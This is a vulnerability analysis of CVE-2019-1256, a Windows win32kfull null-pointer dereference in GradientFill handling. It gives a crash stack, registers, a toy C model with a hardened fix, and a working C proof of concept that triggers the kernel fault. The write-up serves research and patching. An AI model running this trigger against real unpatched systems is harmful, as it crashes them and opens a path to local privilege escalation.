CVE-2019-1256 Vulnerability Analysis
0x00 Vulnerability Information
Impact: local privilege escalation
Affected file: win32kfull.sys
Vulnerable function: GreGradientFill
Root cause: null pointer dereference
Analysis system: Windows 1903
0x01 Vulnerability Analysis
Call stack at the time of the crash:
nt!DbgBreakPointWithStatus
nt!KiBugCheckDebugBreak+0x12
nt!KeBugCheck2+0x952
nt!KeBugCheckEx+0x107
nt!KiBugCheckDispatch+0x69
nt!KiSystemServiceHandler+0x7c
nt!RtlpExecuteHandlerForException+0xf
nt!RtlDispatchException+0x4a5
nt!KiDispatchException+0x16e
nt!KiExceptionDispatch+0x11d
nt!KiPageFault+0x445
win32kfull!GreGradientFill+0x26b
win32kfull!NtGdiGradientFill+0x1c4
nt!KiSystemServiceCopyEnd+0x25
win32u!NtGdiGradientFill+0x14
gdi32full!GdiGradientFill+0x108
Because the hdc flag is changed ahead of time when the bitmap is selected, the code that assigns the SURFACE object is skipped. The SURFACE pointer stored at offset 0x30 of the object is therefore left as 0, and reading through it produces a null pointer dereference; this is later turned into an arbitrary function call to achieve privilege escalation.
Registers at the time of the crash:
rax=0000000000110000 rbx=0000000000000000 rcx=ffff8d8a2f7f2894
rdx=0000000000000002 rsi=0000000000000001 rdi=0000000000000000
rip=ffffc93928981c86 rsp=ffff8d8a2f7f2700 rbp=ffff8d8a2f7f2800
 r8=0000000000000003  r9=00000000000000a0 r10=ffffc90d4d1baf20
r11=0000000000000007 r12=0000000000000007 r13=ffffc90d4d34eff0
r14=ffffc90d49fb52c0 r15=ffffc90d4d34ef80
iopl=0         nv up ei pl zr na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00050246
win32kfull!NtGdiGradientFill+0x416:
ffffc939`28981c86 8b4328          mov     eax,dword ptr [rbx+28h] ds:002b:00000000`00000028=????????
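The bug class above (a status flag set before the object it is supposed to vouch for has been assigned, so a later consumer dereferences a NULL field) is easiest to see in a small model. The following C program is an added example written for this page, not code from win32k or from the author; `toy_dc`, `toy_surface`, `TOY_DC_HAS_SURFACE` and all function names are hypothetical and the struct layout is constructed, not the real DC/SURFACE layout. It places the vulnerable select/consume pair beside a hardened consumer that validates the pointer instead of trusting the flag, which is the fix pattern a reviewer would ask for at the `mov eax,[rbx+28h]` site with rbx == 0.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed, simplified model of the bug class described above.
 * NOT win32k's real DC/SURFACE layout; all names are hypothetical. */
typedef struct toy_surface {
    int32_t  width;
    int32_t  height;
    uint8_t *bits;        /* stands in for the field the crash reads through */
} toy_surface;

typedef struct toy_dc {
    uint32_t     flags;   /* toy stand-in for the hdc flag the post mentions */
    toy_surface *surface; /* toy stand-in for the SURFACE pointer at +0x30 */
} toy_dc;

#define TOY_DC_HAS_SURFACE 0x1u

/* Vulnerable pattern: the flag is used as proof that the assignment happened.
 * If the flag is already set when the select runs, the assignment is skipped
 * and dc->surface silently stays NULL. */
void toy_select_vulnerable(toy_dc *dc, toy_surface *bm)
{
    if (dc->flags & TOY_DC_HAS_SURFACE)
        return;                 /* "already selected": assignment skipped */
    dc->surface = bm;
    dc->flags |= TOY_DC_HAS_SURFACE;
}

/* Vulnerable consumer: mirrors the crash site (a load through rbx == 0),
 * trusting the flag and dereferencing the pointer unconditionally. */
int toy_fill_vulnerable(const toy_dc *dc)
{
    return dc->surface->height;  /* NULL dereference when the select was skipped */
}

/* Hardened consumer: the object pointer itself is validated; the flag is
 * never accepted as a substitute for the pointer being initialised. */
int toy_fill_hardened(const toy_dc *dc)
{
    if (!(dc->flags & TOY_DC_HAS_SURFACE) || dc->surface == NULL ||
        dc->surface->bits == NULL)
        return -1;              /* fail closed instead of faulting */
    return dc->surface->height;
}

/* Scenario 1: normal use, flag clear before the select; both consumers work. */
int toy_scenario_normal(void)
{
    uint8_t pixels[4 * 9] = { 0 };
    toy_surface bm = { 4, 9, pixels };
    toy_dc dc = { 0, NULL };
    toy_select_vulnerable(&dc, &bm);
    return toy_fill_vulnerable(&dc) == 9 ? toy_fill_hardened(&dc) : -2;  /* 9 */
}

/* Scenario 2: flag already set when the select runs (the state the PoC
 * engineers). The assignment is skipped and surface stays NULL; the hardened
 * consumer refuses, while toy_fill_vulnerable() would fault here. */
int toy_scenario_premature_flag(void)
{
    uint8_t pixels[4 * 9] = { 0 };
    toy_surface bm = { 4, 9, pixels };
    toy_dc dc = { TOY_DC_HAS_SURFACE, NULL };
    toy_select_vulnerable(&dc, &bm);
    return toy_fill_hardened(&dc);      /* -1 */
}

/* Returns 1 if the premature flag really leaves the surface pointer NULL. */
int toy_premature_flag_leaves_null(void)
{
    uint8_t pixels[4 * 9] = { 0 };
    toy_surface bm = { 4, 9, pixels };
    toy_dc dc = { TOY_DC_HAS_SURFACE, NULL };
    toy_select_vulnerable(&dc, &bm);
    return dc.surface == NULL;          /* 1 */
}

int main(void)
{
    printf("normal select, hardened fill height: %d\n", toy_scenario_normal());
    printf("premature flag, hardened fill result: %d\n", toy_scenario_premature_flag());
    printf("premature flag leaves surface NULL: %d\n", toy_premature_flag_leaves_null());
    return 0;
}
```

The point of the model is that a flag in the DC records intent, not state: once the flag can be set by a path other than the one that fills in the pointer, every consumer that keys off the flag alone inherits a NULL dereference, so the consumer must check the object it is about to use.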
0x02 Verifying with the PoC
#include <windows.h>
#pragma comment(lib, "msimg32.lib")   /* GradientFill lives in msimg32.dll */

/* SetBitmapAttributes is an undocumented gdi32 export; resolved at runtime. */
typedef HBITMAP(NTAPI* myfull)(HBITMAP, int);

int main()
{
    LoadLibraryA("user32.dll");
    HMODULE gdi = LoadLibraryA("gdi32.dll");
    myfull myfull1 = (myfull)GetProcAddress(gdi, "SetBitmapAttributes");
    //__debugbreak();

    HDC hdc1 = CreateCompatibleDC(0x0);
    HBITMAP hbm1 = CreateBitmap(0x10001, 0x9, 0x0, 0x0, 0x0);
    /* Change the bitmap's attributes before selecting it into the DC */
    HBITMAP hbm2 = myfull1(hbm1, 0x1);
    SelectObject(hdc1, hbm2);

    TRIVERTEX vert[7] = {
        { 0xc9b, 0xfff, 0x3, 0x5, 0x8, 0x10001 },
        { 0x8, 0x4, 0x8, 0x1, 0x3, 0xffffffff80000000 },
        { 0x1, 0xffffffffffffffc1, 0x3, 0x8000, 0x3000000000, 0x2630 },
        { 0x7ff, 0x2, 0x0, 0x3, 0x4 },
        { 0x5, 0x4, 0x1, 0x8001, 0x7ff, 0x5 },
        { 0x100000000, 0x5, 0x0, 0x8000, 0x9, 0x9 },
        { 0 }
    };
    GRADIENT_RECT rect[2] = { { 0x3, 0x7 } };
    /* Reaches NtGdiGradientFill/GreGradientFill with the DC in the bad state */
    GradientFill(hdc1, vert, 0x7, &rect, 0x1, 0x0);
    return 0;
}
From here on the mountains are high and the road is long; spur the horse and ride on. May the journey ahead be warm through the three winter months and never cold in spring, with a lamp when night falls and an umbrella when it rains. Live this life to the full, and never betray the courage to press forward.